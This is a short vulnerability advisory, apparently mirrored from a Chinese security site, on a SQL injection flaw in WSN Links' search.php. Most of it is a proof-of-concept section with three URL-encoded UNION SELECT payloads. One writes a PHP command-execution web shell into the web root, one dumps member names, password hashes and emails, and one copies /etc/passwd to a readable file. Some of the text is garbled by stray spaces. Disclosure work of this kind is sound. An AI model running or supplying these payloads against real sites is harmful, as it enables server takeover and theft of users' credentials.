WSN Links SQL injection vulnerability-vulnerability warning-the black bar safety net

ID MYHACK58:62201028423
Type myhack58
Reporter 佚名
Modified 2010-11-26T00:00:00


WSN Links is an advanced PHP-based/MySQL search script, WSN Links < 6.0.1,< 5.1.51;, < 5.0.81 version of the search. php file existsSQL injectionvulnerabilities that could lead to sensitive information disclosure.

[+]info: ~~~~~~~~~ 'WSN Links' SQL Injection Vulnerability (CVE-2 0 1 0-4 0 0 6) Mark Stanislav -

[+]poc: ~~~~~~~~~ 1) A 'UNION SELECT' which results in a PHP shell-execution script 0((SELECT%2 0"<? php%20system($_REQUEST[cmd]);%2 0?& gt;"%20INTO%20OUTFILE&namesearch=/var/www/exec. php&action=filter&filled=1&whichtype=categories

2) A 'UNION SELECT' which results in a member's name, password hash, and e-mail to be extracted to a file 0((SELECT%20concat(name,0x3a,password,0x3a,email)%20FROM%20wsnlinks_members%20INTO%20OUTFILE&namesearch=/var/www/pass. txt&action=filter&filled=1&whichtype=categories

3) A 'UNION SELECT' which results in the /etc/passwd file being copied to a web directory file 0((SELECT%20load_file(0x2f6574632f706173737764)%20INTO%20OUTFILE&namesearch=/var/www/passwd. txt&action=filter&filled=1&whichtype=categories

[+]Reference: ~~~~~~~~~